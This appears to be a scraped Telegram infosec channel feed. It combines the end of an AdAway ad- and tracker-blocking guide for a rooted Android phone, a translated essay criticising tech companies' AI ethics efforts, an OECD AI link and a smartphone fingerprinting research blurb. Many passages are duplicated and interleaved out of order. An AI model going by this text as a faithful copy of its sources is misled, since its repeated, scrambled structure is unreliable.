The installation of AdAway is done conveniently via the F-Droid Store - where the app does not violate questionable business models, as is the case with Google. With a tap on Install the installation of AdAway is done within seconds.
2.3 Adjustment via Magisk
Due to the read-only system partition of the Aquaris X Pro, the Hosts file cannot simply be modified by AdAway. However, this is necessary so that all domains that should not be accessible later can be stored there. Magisk offers a solution for this. Opens the Magisk Manager and calls up the settings. There you tap once on Activate system-less Hosts file.
3. configuration
The configuration of AdAway is done within a few minutes. Many advertising and tracking domains are already blocked in the delivery state. By adding more filter lists we can improve the result even more.
3.1 Initial Start
Immediately after the start AdAway will ask you if you want to send telemetry data (via sentry) to the developer. This is the following information:
Crash report and application failures,
Application usage.
Both kinds of report does not contains any personal data.
Then you can start AdAway directly with a tip on ACTIVATE ADMINISTRATIVE BLOCKS. AdAway will then download the current (block) lists and update the Hosts file.
3.2 Settings
Via the menu item Settings you can configure various options of AdAway. Among other things, you can specify that the (block) lists should be updated daily. The download and installation can be done automatically in the background.
By default, AdAway redirects all blocked hostnames to the IP address 127.0.0.1. For speed reasons, you should change this, as redirecting to 127.0.0.1 (localhost) actually causes network traffic. Tap on the Redirection IP entry and configure the address there:
0.0.0.0
3.3 Blacklists | Add filter listsVia the menu item Hosts-sources you can add further filter lists. Three (block) lists are active in AdAway by default. You can use the plus sign to add additional lists that are not included in AdAway. My suggestion would be to add the following to the existing lists:
https://github.com/StevenBlack/hosts
💡AdviceIn the AdAway Wiki you will find further suggestions and filter lists.
https://github.com/AdAway/AdAway/wiki/HostsSources
Of course you can also activate other filter lists or (block) lists. Possible overlaps are automatically removed by AdAway - duplicate entries would be too inefficient to process the filter lists. After adding the filter lists, AdAway will first download them from the sources and merge them into one big list - so you'll have to wait a moment.Activating the filter lists can lead to so-called "overblocking". This means that domains that are necessary for the functionality of an app are filtered incorrectly. You will then have to decide on a case-by-case basis whether you want to release the domain in AdAway or put it on the whitelist. Further information on this topic can be found in Section 4.2.
4th AdAway in action
The configuration of AdAway is finished or you can customize it to your needs. Unfortunately AdAway does not offer the possibility to display the number of blocked domains - it should be more than 100.000 domains.
4.1 Blocked Domains
As already mentioned, the phenomenon of overblocking can occur, which can under certain circumstances lead to an app or certain function no longer functioning correctly. Personally, I have not been able to observe this so far - however, I am not the appropriate yardstick in this respect either, as I deliberately do without the services of Google, Facebook and Co.
So if an app doesn't work as usual, you should first activate DNS recording via the menu item Record DNS Requests and then open the app that doesn't work. Then open the menu item Record DNS Queries again and tap on the button Display RESULTS. All logged DNS queries will then be listed. As an example I allow the domain "media.kuketz.de" by tapping on the tick in the middle. AdAway will then remember this selection and put the domain on the whitelist:
4.2 Whitelist of a domain | App
Via the menu item Your Lists you can view the domains you have added yourself. AdAway distinguishes between three different variants:
Negative list:
You can add your own domains to block AdAway. In a way, this is a supplement to the existing (block) lists, which you can influence yourself.
Positive list:
As already mentioned, the overblocking effect may occur under certain circumstances. If this happens, you can make a domain accessible again via the positive list. The positive list is always before the filter lists - so the domain is reachable again, even if it is listed in one of the filter lists.
Redirections:
If necessary, you can activate IP redirects for certain domains. The domain "facebook.com" could be pointed to the IP address
193.99.144.80 (heise.de). If you call the domain "facebook.com" in your browser, you will be redirected to heise.de.5. final note
The integration of advertising or the transmission of data to tracking companies is not necessary for the pure function provision of an app. These third-party software components do not simply end up in an app by magic, but are deliberately or actively integrated by the developers. Unfortunately, the developers themselves often do not know which data these building blocks or modules (also known as SDK in technical jargon) actually capture. Thus providers and developers sacrifice their users frivolously on the altar of boundless data collection frenzy, regardless of the associated risks for the security and privacy of their users.
With AdAway, you can minimize this unwanted data transfer. In practice, the principle of DNS blocking works extremely well - the vast majority of unwanted tracking and advertising domains are filtered, which of course has a positive effect on both security and privacy.
Nevertheless, you should not lull yourself into security and now believe that you are solving all tracker and privacy problems. Under certain circumstances it may happen that a tracking or advertising domain is still so unknown or new that it has not yet found its way to one of the (block) lists. In this case, there is a high probability that unwanted data will flow out to questionable third parties. The best long-term protection against unwanted data leakage is to do without most of the apps offered in the Google Play Store. Fortunately, the F-Droid Store is an alternative app store that addresses critical users who value free and open source applications. In the recommendation corner you will find data protection-friendly apps for a wide variety of applications.
6. conclusion
In the Google Play Store there is a whole arsenal of "pseudo-security apps" like virus scanners, which lull the user into false security. AdAway, on the other hand, can effectively protect security and privacy. The paradox is that AdAway is excluded from the Google Play Store because blocking trackers and advertising is against Google's business model. An app that blocks the delivery of Google advertising and tracking is understandably a thorn in Google's side.
In the following article of the article series "Take back control!" I will show you how to block "Big Brother Apps" from the Google Play Store into a kind of closed environment or prison - this is possible with Shelter. This way you can avoid that these apps access sensitive data (contacts etc.).
Source (🇩🇪) and more info:
https://www.kuketz-blog.de/adaway-werbe-und-trackingblocker-take-back-control-teil6/
#android #NoGoogle #guide #part1 #part2 #part4 #part5 #part6 #AdAway #kuketz
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
6. conclusion
In the Google Play Store there is a whole arsenal of "pseudo-security apps" like virus scanners, which lull the user into false security. AdAway, on the other hand, can effectively protect security and privacy. The paradox is that AdAway is excluded from the Google Play Store because blocking trackers and advertising is against Google's business model. An app that blocks the delivery of Google advertising and tracking is understandably a thorn in Google's side.
In the following article of the article series "Take back control!" I will show you how to block "Big Brother Apps" from the Google Play Store into a kind of closed environment or prison - this is possible with Shelter. This way you can avoid that these apps access sensitive data (contacts etc.).
Source (🇩🇪) and more info:
https://www.kuketz-blog.de/adaway-werbe-und-trackingblocker-take-back-control-teil6/
#android #NoGoogle #guide #part1 #part2 #part4 #part5 #part6 #AdAway #kuketz
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
All just fake ethics
After numerous scandals, Facebook, Google and Co. have recently been playing the role of moral model students. Why we shouldn't fall for this scam.
Lean back, breathe calmly - in, out. There's no reason to get excited, you're in good hands. Even if the last time was difficult and you feel betrayed: We have listened, we promise improvement.
Everything will be different, no: Everything will be fine.
The promise
This is the sound of the hypnotic singsong currently blowing out of Silicon Valley.
For example, from Google headquarters, where ethicists are to discuss algorithms in the future, or from the mouth of Facebook boss Mark Zuckerberg. He suddenly wants the privacy of his users to take precedence over everything else and has recently expressed the wish for a "more active role for governments" in tech regulation. This follows a series of scandals that have severely damaged his company's reputation. The big IT companies no longer want to be the bad boys. Instead, they want to look more mature and virtuous. https://netzpolitik.org/2018/die-ultimative-liste-so-viele-datenskandale-gab-es-2018-bei-facebook/
Throughout the Valley, people are purifying themselves after the crisis tactics of recent years, mantra-like professing their own responsibility - code name: Corporate Digital Responsibility. The corporations seem to be reflecting on the good and calling out, frightened by the risks and side effects of their own smart developments, one ethic after the other, especially in the field of artificial intelligence (AI).
Mark Zuckerberg recently even announced ideas for regulating the Internet in a charm offensive - after having lobbied for years against everything that looked like the law (e.g. the DSGVO). The CEO of Facebook not only pretended to obey the authorities in advance, but also pretended to be a moral lawyer who wished to "preserve the good" on the Internet in order to present his own solutions from the very top with proposals for a "more active role for governments". https://www.washingtonpost.com/opinions/mark-zuckerberg-the-internet-needs-new-rules-lets-start-in-these-four-areas/2019/03/29/9e6f0504-521a-11e9-a3f7-78b7525a8d5f_story.html?noredirect=on&utm_term=.e2c285fa7e1e
Critics see Zuckerberg's proclamation as a clever calculation of power to cement their own monopoly position. They sense that someone here wants to take off their dirty coat in order to stage themselves as decent, clean-washed again. The discomfort is well-founded. And it doesn't just extend to Zuckerberg's new desire for clear rules.
The measures with which Google, Facebook and Co. want to get their problems in terms of credibility, data protection or artificial intelligence under control seem immature. They are fragmentary - and in most cases only a facade of public relations behind which the void yawns.
The problems
Google: Distorted Algorithms
For example at Google. There, in 2018, internal protests against Project Maven, an order from the US Department of Defense for the AI-supported, image-analytical improvement of drone attacks, were raised. CEO Sundar Pichai quickly announced new ethical guidelines: Google wanted to ensure that its AI systems would operate in a socially responsible manner, comply with scientific rigour, protect privacy, not discriminate unfairly, and generally be safe and responsible. https://www.blog.google/technology/ai/ai-principles/
But whether this catalogue of principles, formulated in the form of seven commandments, really promises a new responsibility in AI is highly questionable. As long as Google itself determines what an "appropriate transparency" and what a "relevant explanation" is, the effect of the new guidelines and the interpretation of the terms will remain a company secret - a beautiful appearance that at best simulates clear rules.
After numerous scandals, Facebook, Google and Co. have recently been playing the role of moral model students. Why we shouldn't fall for this scam.
Lean back, breathe calmly - in, out. There's no reason to get excited, you're in good hands. Even if the last time was difficult and you feel betrayed: We have listened, we promise improvement.
Everything will be different, no: Everything will be fine.
The promise
This is the sound of the hypnotic singsong currently blowing out of Silicon Valley.
For example, from Google headquarters, where ethicists are to discuss algorithms in the future, or from the mouth of Facebook boss Mark Zuckerberg. He suddenly wants the privacy of his users to take precedence over everything else and has recently expressed the wish for a "more active role for governments" in tech regulation. This follows a series of scandals that have severely damaged his company's reputation. The big IT companies no longer want to be the bad boys. Instead, they want to look more mature and virtuous. https://netzpolitik.org/2018/die-ultimative-liste-so-viele-datenskandale-gab-es-2018-bei-facebook/
Throughout the Valley, people are purifying themselves after the crisis tactics of recent years, mantra-like professing their own responsibility - code name: Corporate Digital Responsibility. The corporations seem to be reflecting on the good and calling out, frightened by the risks and side effects of their own smart developments, one ethic after the other, especially in the field of artificial intelligence (AI).
Mark Zuckerberg recently even announced ideas for regulating the Internet in a charm offensive - after having lobbied for years against everything that looked like the law (e.g. the DSGVO). The CEO of Facebook not only pretended to obey the authorities in advance, but also pretended to be a moral lawyer who wished to "preserve the good" on the Internet in order to present his own solutions from the very top with proposals for a "more active role for governments". https://www.washingtonpost.com/opinions/mark-zuckerberg-the-internet-needs-new-rules-lets-start-in-these-four-areas/2019/03/29/9e6f0504-521a-11e9-a3f7-78b7525a8d5f_story.html?noredirect=on&utm_term=.e2c285fa7e1e
Critics see Zuckerberg's proclamation as a clever calculation of power to cement their own monopoly position. They sense that someone here wants to take off their dirty coat in order to stage themselves as decent, clean-washed again. The discomfort is well-founded. And it doesn't just extend to Zuckerberg's new desire for clear rules.
The measures with which Google, Facebook and Co. want to get their problems in terms of credibility, data protection or artificial intelligence under control seem immature. They are fragmentary - and in most cases only a facade of public relations behind which the void yawns.
The problems
Google: Distorted Algorithms
For example at Google. There, in 2018, internal protests against Project Maven, an order from the US Department of Defense for the AI-supported, image-analytical improvement of drone attacks, were raised. CEO Sundar Pichai quickly announced new ethical guidelines: Google wanted to ensure that its AI systems would operate in a socially responsible manner, comply with scientific rigour, protect privacy, not discriminate unfairly, and generally be safe and responsible. https://www.blog.google/technology/ai/ai-principles/
But whether this catalogue of principles, formulated in the form of seven commandments, really promises a new responsibility in AI is highly questionable. As long as Google itself determines what an "appropriate transparency" and what a "relevant explanation" is, the effect of the new guidelines and the interpretation of the terms will remain a company secret - a beautiful appearance that at best simulates clear rules.
Google's bids were not only a response to militarily explosive projects, but also a reaction to Jacky Alciné's case, which became known in 2015: Alciné and his girlfriend were identified as "gorillas" in Google Photos. This racist bias referred on the one hand to a patchy data set and on the other to a diversity problem among Google programmers. Both are fundamental problems for many digital companies, as a study by the MIT lab found out. https://twitter.com/jackyalcine/status/615329515909156865?lang=en and http://proceedings.mlr.press/v81/buolamwini18a/buolamwini18a.pdf
The AI-supported face recognition software from IBM, Microsoft and Face++ also recognizes one group of people particularly well: white men. Black men, on the other hand, were wrongly classified in six percent of cases, black women in almost one third.
IBM: Questionable application areas
IBM, too, has therefore sought ethical guidelines and even developed ethnic-diverse data sets to correct distortions in its software. IBM CEO Virginia Rometty told the press that the company wanted to remain attractive especially in the areas of trust and transparency: "Every organization that develops or uses AI or stores or processes the data must act responsibly and transparently.
However, the fact that IBM's face recognition software was used in Rodrigo Duterte's "War on Drugs" in the Philippines suggests that ethically responsible action is by no means guaranteed even with a distortion-free AI. Because the difficulties are not limited to the smooth functioning of the system, but are reflected above all in its questionable application. Can an ever more precise recording of the population - especially of marginalized groups - be desirable at all? Perhaps, as the authorities in San Francisco recently decided, it would be better to do without such technologies altogether.
The fact that Google has also resumed work on a search engine for the Chinese market contrary to the announcement is another reason to become suspicious of the company's own catalogues of principles. For they do not define themselves as categorical imperatives, but as morally blurred declarations of intent whose commercial interpretation promises maximum flexibility. One must therefore almost inevitably agree with Rometty's words: "Society will decide which companies it trusts".
Microsoft: Ethics Council without bite
Microsoft has also been committed to the values of "transparency", "non-discrimination", "reliability", "accessibility", "responsibility" and "data protection" for a year now. In order to make such guidelines appear not only to be pretty but ultimately meaningless brochures, an ethics committee was established, the AI and Ethics in Engineering and Research (Aether) Committee, which advises developers on moral issues such as facial recognition and autonomous weapon systems. https://theintercept.com/2019/03/20/rodrigo-duterte-ibm-surveillance/
However, the committee is not allowed to provide information to the public. Hardly anything is known about the committee's working methods - what is known is limited to the statements of those responsible. These seldom shed light on the darkness. Eric Horvitz, director of the Microsoft Research Lab, recently proudly stated - albeit without giving any concrete figures - that the Aether Committee had already expressed reservations about the fact that several profits had not been realized. The committee had therefore shown its teeth. https://www.geekwire.com/2018/microsoft-cutting-off-sales-ai-ethics-top-researcher-eric-horvitz-says/
The AI-supported face recognition software from IBM, Microsoft and Face++ also recognizes one group of people particularly well: white men. Black men, on the other hand, were wrongly classified in six percent of cases, black women in almost one third.
IBM: Questionable application areas
IBM, too, has therefore sought ethical guidelines and even developed ethnic-diverse data sets to correct distortions in its software. IBM CEO Virginia Rometty told the press that the company wanted to remain attractive especially in the areas of trust and transparency: "Every organization that develops or uses AI or stores or processes the data must act responsibly and transparently.
However, the fact that IBM's face recognition software was used in Rodrigo Duterte's "War on Drugs" in the Philippines suggests that ethically responsible action is by no means guaranteed even with a distortion-free AI. Because the difficulties are not limited to the smooth functioning of the system, but are reflected above all in its questionable application. Can an ever more precise recording of the population - especially of marginalized groups - be desirable at all? Perhaps, as the authorities in San Francisco recently decided, it would be better to do without such technologies altogether.
The fact that Google has also resumed work on a search engine for the Chinese market contrary to the announcement is another reason to become suspicious of the company's own catalogues of principles. For they do not define themselves as categorical imperatives, but as morally blurred declarations of intent whose commercial interpretation promises maximum flexibility. One must therefore almost inevitably agree with Rometty's words: "Society will decide which companies it trusts".
Microsoft: Ethics Council without bite
Microsoft has also been committed to the values of "transparency", "non-discrimination", "reliability", "accessibility", "responsibility" and "data protection" for a year now. In order to make such guidelines appear not only to be pretty but ultimately meaningless brochures, an ethics committee was established, the AI and Ethics in Engineering and Research (Aether) Committee, which advises developers on moral issues such as facial recognition and autonomous weapon systems. https://theintercept.com/2019/03/20/rodrigo-duterte-ibm-surveillance/
However, the committee is not allowed to provide information to the public. Hardly anything is known about the committee's working methods - what is known is limited to the statements of those responsible. These seldom shed light on the darkness. Eric Horvitz, director of the Microsoft Research Lab, recently proudly stated - albeit without giving any concrete figures - that the Aether Committee had already expressed reservations about the fact that several profits had not been realized. The committee had therefore shown its teeth. https://www.geekwire.com/2018/microsoft-cutting-off-sales-ai-ethics-top-researcher-eric-horvitz-says/
Whether the committee really shows effect may be doubted, however. As the AI expert Rumman Chowdhury recently explained, the committee cannot make any changes, but only make recommendations. And so it's not surprising that Microsoft has raised awareness on its own blog about the ethical problems of AIs in the context of military projects, but despite employee protests still wants to cooperate with the US Department of Defense: "We can't address these new developments if the people in the tech sector who know the most about the technology withdraw from the debate. https://www.theverge.com/2019/4/3/18293410/ai-artificial-intelligence-ethics-boards-charters-problem-big-tech
Ethical ideals, for example, are in principle documented at Microsoft, but often appear as gross silhouettes. As long as expert councils act in secret and without authority to issue directives, the "applied ethics" of the technology companies remain nothing but a loose lip service.
Google: The wrong partners
In addition to the planned lack of transparency, the structure of the ethics councils in particular often points to questionable breaking points. Although their composition usually follows the pretty principle of "interdisciplinarity", they rarely impress with ethical qualifications.
Google recently found out that this is a problem. Starting in April, an eight-member Advanced Technology External Advisory Council was to check whether the self-estimated values are really filled with life for AI development. Even before the first meeting, the council was suspended again because parts of the staff protested against the appointment of the committee and wanted both Dyan Gibbens, CEO of the drone manufacturer Trumbull, and Kay Coles James, President of the neoconservative Thinktanks Heritage Foundation, banished. https://blog.google/technology/ai/external-advisory-council-help-advance-responsible-development-ai/
Meanwhile, Google is acting at a loss - after all, without explaining anything in detail, they want to "break new ground" in order to obtain external opinions.
Facebook: Purchased research
Meanwhile, Facebook shows us how to avoid the problems of a lack of expertise and at the same time appear untrustworthy. The social network also wants to have the ethical challenges of the AI externally evaluated and founded the Institute for Ethics in Artificial Intelligence in cooperation with the Technical University of Munich at the beginning of the year. Facebook is investing 6.5 million euros over 5 years to develop "ethical guidelines for the responsible use of this technology in business and society". https://www.tum.de/die-tum/aktuelles/pressemitteilungen/detail/article/35188/
Since a company whose CEO once called its users "dumb fucks" also looks like a praiseworthy effort for ethical make-up, it was hardly surprising that criticism quickly rose. This was mostly aimed at the risk of purchased research and anticipated conflicts of interest as well as the moral damage the university would suffer if it "went to bed" with such a company. https://www.theguardian.com/technology/2018/apr/17/facebook-people-first-ever-mark-zuckerberg-harvard
Christoph Lütge, the future director of the institute, replied that Facebook was independent and that the research was published transparently, referring to the "win-win situation" for society as a whole resulting from the financing of Facebook.
But there are also limits to ethical research at the TU Munich. In an interview, Lütge stated that society's concerns about artificial intelligence would be addressed - but also that ethics "can do this better than legal regulation". https://netzpolitik.org/2019/warum-facebook-ein-institut-fuer-ethik-in-muenchen-finanziert/
Ethical ideals, for example, are in principle documented at Microsoft, but often appear as gross silhouettes. As long as expert councils act in secret and without authority to issue directives, the "applied ethics" of the technology companies remain nothing but a loose lip service.
Google: The wrong partners
In addition to the planned lack of transparency, the structure of the ethics councils in particular often points to questionable breaking points. Although their composition usually follows the pretty principle of "interdisciplinarity", they rarely impress with ethical qualifications.
Google recently found out that this is a problem. Starting in April, an eight-member Advanced Technology External Advisory Council was to check whether the self-estimated values are really filled with life for AI development. Even before the first meeting, the council was suspended again because parts of the staff protested against the appointment of the committee and wanted both Dyan Gibbens, CEO of the drone manufacturer Trumbull, and Kay Coles James, President of the neoconservative Thinktanks Heritage Foundation, banished. https://blog.google/technology/ai/external-advisory-council-help-advance-responsible-development-ai/
Meanwhile, Google is acting at a loss - after all, without explaining anything in detail, they want to "break new ground" in order to obtain external opinions.
Facebook: Purchased research
Meanwhile, Facebook shows us how to avoid the problems of a lack of expertise and at the same time appear untrustworthy. The social network also wants to have the ethical challenges of the AI externally evaluated and founded the Institute for Ethics in Artificial Intelligence in cooperation with the Technical University of Munich at the beginning of the year. Facebook is investing 6.5 million euros over 5 years to develop "ethical guidelines for the responsible use of this technology in business and society". https://www.tum.de/die-tum/aktuelles/pressemitteilungen/detail/article/35188/
Since a company whose CEO once called its users "dumb fucks" also looks like a praiseworthy effort for ethical make-up, it was hardly surprising that criticism quickly rose. This was mostly aimed at the risk of purchased research and anticipated conflicts of interest as well as the moral damage the university would suffer if it "went to bed" with such a company. https://www.theguardian.com/technology/2018/apr/17/facebook-people-first-ever-mark-zuckerberg-harvard
Christoph Lütge, the future director of the institute, replied that Facebook was independent and that the research was published transparently, referring to the "win-win situation" for society as a whole resulting from the financing of Facebook.
But there are also limits to ethical research at the TU Munich. In an interview, Lütge stated that society's concerns about artificial intelligence would be addressed - but also that ethics "can do this better than legal regulation". https://netzpolitik.org/2019/warum-facebook-ein-institut-fuer-ethik-in-muenchen-finanziert/
Perhaps as a result, really important questions came up: whether, how and at what speed we do the business of digitization, in which areas we want to use AI systems such as face recognition at all, and how regulation can look beyond a calendar-like responsibility. Where do our red lines run?
A critical public will therefore be more important than ever. In this sense, breathe in and out calmly. But leaning back doesn't count - otherwise we'll be the all too trusting "dumb fucks" mentioned above.
https://www.republik.ch/2019/05/22/alles-nur-fake-ethik
#thinkabout #why
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
A critical public will therefore be more important than ever. In this sense, breathe in and out calmly. But leaning back doesn't count - otherwise we'll be the all too trusting "dumb fucks" mentioned above.
https://www.republik.ch/2019/05/22/alles-nur-fake-ethik
#thinkabout #why
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
This is exactly where the matter becomes delicate. For as long as the companies themselves issue guidelines beyond generally applicable laws, "regulate themselves" through self-chosen councils or finance "independent" research themselves, doubts ferment as to whether the ethical principles are really sufficient; whether they are maintained or enforced at all - or whether they are not just a fleshless shell and thus cheap PR.
EU: Trustworthy CI
So the self-proclaimed do-gooders from Silicon Valley can hardly be expected to do anything substantial when it comes to ethics. From the stylized wording of Potemkin's ethics councils to the always the same, meaningless term casings, a lot of verbal fuss is made. But there are usually no consequences that really question one's own actions.
Their educational work thus has no effect whatsoever as a "principle of responsibility" (Hans Jonas), but as an act of precautionary ethics washing. If something goes wrong again, one will at least be able to explain it: After all, we made an effort.
The EU has now recognised the problem and set up the 52-member High-Level Expert Group on Artificial Intelligence itself, an expert committee that was to develop guidelines for AI. https://ec.europa.eu/digital-single-market/en/high-level-expert-group-artificial-intelligence
The result was presented in April - and was sobering. Thomas Metzinger, Professor of Theoretical Philosophy and one of only four ethicists in the group, described it as "lukewarm, short-sighted and deliberately vague". Resolute rejections, such as the use of lethal autonomous weapon systems, had been dispensed with at the insistence of industry representatives and the proclaimed "trustworthy AI" was nothing more than a stale "marketing narrative". https://background.tagesspiegel.de/ethik-waschmaschinen-made-in-europe
Metzinger's conclusion:
If the economy is too strongly involved in the discussion, at best "fake ethics" will emerge - but no real ethical progress. His appeal: Civil society must take the ethics debate away from industry again in order to develop the guidelines further itself. But how?
The tasks
Loose concepts could never make things and people better on their own. And preaching morality, as Friedrich Nietzsche already knew, is "just as easy as justifying morality is difficult". So instead of formulating a few melodious but shallow principles ex post, it is necessary to start earlier.
This means that already during the training of the developers - the TU Kaiserslautern, for example, offers the study course Socioinformatics - ethical and socio-political questions are raised and institutions are strengthened that negotiate ethics and digitality on a higher level beyond the relevant lobbyism. Institutions that push the discourse on effective rules without blinkers and false considerations.
Humanities scholars are also in demand here. Ethics, this would be the goal, must not remain a mere accessory that modestly accompanies or softly covers the laisser-faire in digital space. As a practice of consistent, critical assessment, its task should be to develop clear criteria for the corridors of action and thus also to determine the framework on which binding regulations are based. If it does not do so, it misses its potential and runs the risk of becoming meaningless.
To avoid this, it is necessary not to rely on the voluntary self-regulation of the tech elite, but to declare oneself more independent, in order to combine reflection on morality with reflection on the establishment of the world. Because if digital corporations are penetrating more and more areas of life and are decisively shaping social coexistence through their smart systems, this circumstance should be taken seriously. And think fundamentally about whether the techies, entrepreneurs and engineers alone should decide on the ethical dimensions of their developments - or whether this should not be a democratic, participatory, and thus many-voiced process.
EU: Trustworthy CI
So the self-proclaimed do-gooders from Silicon Valley can hardly be expected to do anything substantial when it comes to ethics. From the stylized wording of Potemkin's ethics councils to the always the same, meaningless term casings, a lot of verbal fuss is made. But there are usually no consequences that really question one's own actions.
Their educational work thus has no effect whatsoever as a "principle of responsibility" (Hans Jonas), but as an act of precautionary ethics washing. If something goes wrong again, one will at least be able to explain it: After all, we made an effort.
The EU has now recognised the problem and set up the 52-member High-Level Expert Group on Artificial Intelligence itself, an expert committee that was to develop guidelines for AI. https://ec.europa.eu/digital-single-market/en/high-level-expert-group-artificial-intelligence
The result was presented in April - and was sobering. Thomas Metzinger, Professor of Theoretical Philosophy and one of only four ethicists in the group, described it as "lukewarm, short-sighted and deliberately vague". Resolute rejections, such as the use of lethal autonomous weapon systems, had been dispensed with at the insistence of industry representatives and the proclaimed "trustworthy AI" was nothing more than a stale "marketing narrative". https://background.tagesspiegel.de/ethik-waschmaschinen-made-in-europe
Metzinger's conclusion:
If the economy is too strongly involved in the discussion, at best "fake ethics" will emerge - but no real ethical progress. His appeal: Civil society must take the ethics debate away from industry again in order to develop the guidelines further itself. But how?
The tasks
Loose concepts could never make things and people better on their own. And preaching morality, as Friedrich Nietzsche already knew, is "just as easy as justifying morality is difficult". So instead of formulating a few melodious but shallow principles ex post, it is necessary to start earlier.
This means that already during the training of the developers - the TU Kaiserslautern, for example, offers the study course Socioinformatics - ethical and socio-political questions are raised and institutions are strengthened that negotiate ethics and digitality on a higher level beyond the relevant lobbyism. Institutions that push the discourse on effective rules without blinkers and false considerations.
Humanities scholars are also in demand here. Ethics, this would be the goal, must not remain a mere accessory that modestly accompanies or softly covers the laisser-faire in digital space. As a practice of consistent, critical assessment, its task should be to develop clear criteria for the corridors of action and thus also to determine the framework on which binding regulations are based. If it does not do so, it misses its potential and runs the risk of becoming meaningless.
To avoid this, it is necessary not to rely on the voluntary self-regulation of the tech elite, but to declare oneself more independent, in order to combine reflection on morality with reflection on the establishment of the world. Because if digital corporations are penetrating more and more areas of life and are decisively shaping social coexistence through their smart systems, this circumstance should be taken seriously. And think fundamentally about whether the techies, entrepreneurs and engineers alone should decide on the ethical dimensions of their developments - or whether this should not be a democratic, participatory, and thus many-voiced process.
Launch Ceremony for the Adoption of the OECD Recommendation on Artificial Intelligence
22 May 2019, OECD, Paris
http://www.oecd.org/about/secretary-general/launch-ceremony-for-adoption-of-oecd-recommendation-on-ai-paris-may-2019.htm
#OECD #ArtificialIntelligence
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
22 May 2019, OECD, Paris
http://www.oecd.org/about/secretary-general/launch-ceremony-for-adoption-of-oecd-recommendation-on-ai-paris-may-2019.htm
#OECD #ArtificialIntelligence
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
This media is not supported in your browser
VIEW IN TELEGRAM
📺 SensorID
Sensor Calibration Fingerprinting for Smartphones
When you visit a website, your web browser provides a range of information to the website, including the name and version of your browser, screen size, fonts installed, and so on. Ostensibly, this information allows the website to provide a great user experience. Unfortunately this same information can also be used to track you. In particular, this information can be used to generate a distinctive signature, or device fingerprint, to identify you.
📺 https://sensorid.cl.cam.ac.uk/
#tracking #android #ios #fingerprinting
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Sensor Calibration Fingerprinting for Smartphones
When you visit a website, your web browser provides a range of information to the website, including the name and version of your browser, screen size, fonts installed, and so on. Ostensibly, this information allows the website to provide a great user experience. Unfortunately this same information can also be used to track you. In particular, this information can be used to generate a distinctive signature, or device fingerprint, to identify you.
📺 https://sensorid.cl.cam.ac.uk/
#tracking #android #ios #fingerprinting
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN